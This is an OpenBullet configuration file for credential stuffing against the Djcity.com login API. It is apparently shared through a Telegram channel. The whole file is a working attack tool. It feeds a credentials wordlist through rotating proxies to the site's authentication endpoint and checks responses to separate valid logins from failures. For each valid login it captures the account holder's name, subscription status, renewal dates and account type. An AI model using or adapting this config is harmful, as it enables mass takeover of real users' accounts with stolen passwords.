[SETTINGS] { "Name": "Djcity.com", "SuggestedBots": 150, "MaxCPM": 0, "LastModified": "2020-09-11T12:36:09.3469928-07:00", "AdditionalInfo": "Telegram Channel : T.me/OpenBulletConfigs", "RequiredPlugins": [], "Author": "\"The_FiendQQ\"", "Version": "1.2.2", "SaveEmptyCaptures": false, "ContinueOnCustom": false, "SaveHitsToTextFile": false, "IgnoreResponseErrors": false, "MaxRedirects": 8, "NeedsProxies": true, "OnlySocks": false, "OnlySsl": false, "MaxProxyUses": 0, "BanProxyAfterGoodStatus": false, "BanLoopEvasionOverride": -1, "EncodeData": false, "AllowedWordlist1": "Credentials", "AllowedWordlist2": "", "DataRules": [], "CustomInputs": [], "ForceHeadless": false, "AlwaysOpen": false, "AlwaysQuit": false, "QuitOnBanRetry": false, "DisableNotifications": false, "CustomUserAgent": "", "RandomUA": false, "CustomCMDArgs": "" } [SCRIPT] #Login REQUEST POST "https://api.djcity.com/v1/auth" CONTENT "{\"username\":\"\",\"password\":\"\"}" CONTENTTYPE "application/json" HEADER "accept-encoding: gzip, deflate, br" HEADER "accept-language: en-US,en;q=0.9,fa;q=0.8" HEADER "origin: https://www.djcity.com" HEADER "referer: https://www.djcity.com/login" HEADER "sec-fetch-dest: empty" HEADER "sec-fetch-mode: cors" HEADER "sec-fetch-site: same-site" HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" HEADER "x-djc-app-id: CA92FEA5-7EB5-4C02-AF8F-3ED79325F738" HEADER "x-djc-app-version: 4.0.0" KEYCHECK KEYCHAIN Failure OR KEY "Username or password incorrect." KEYCHAIN Success OR KEY "token" #FirstName PARSE "" JSON "firstName" -> VAR "FN" #FullName PARSE "" JSON "lastName" CreateEmpty=FALSE -> CAP "Name" " " "" #ActiveSubscription PARSE "" JSON "activeSubscription" CreateEmpty=FALSE -> CAP "Active Subscription" #LastRenewal PARSE "" LR "lastRenewal\":\"" "T" CreateEmpty=FALSE -> CAP "Last Renewal" #NextCycle PARSE "" LR "nextCycle\":\"" "T" CreateEmpty=FALSE -> CAP "Next Cycle" #Locale PARSE "" JSON "locale" CreateEmpty=FALSE -> CAP "Locale" #AccountType PARSE "" JSON "accountType" CreateEmpty=FALSE -> CAP "Account Type" #AutoSubscription PARSE "" JSON "autoSubscription" CreateEmpty=FALSE -> CAP "Auto Subscription" #Free KEYCHECK BanOnToCheck=FALSE KEYCHAIN Custom "FREE" OR KEY "" DoesNotContain "True"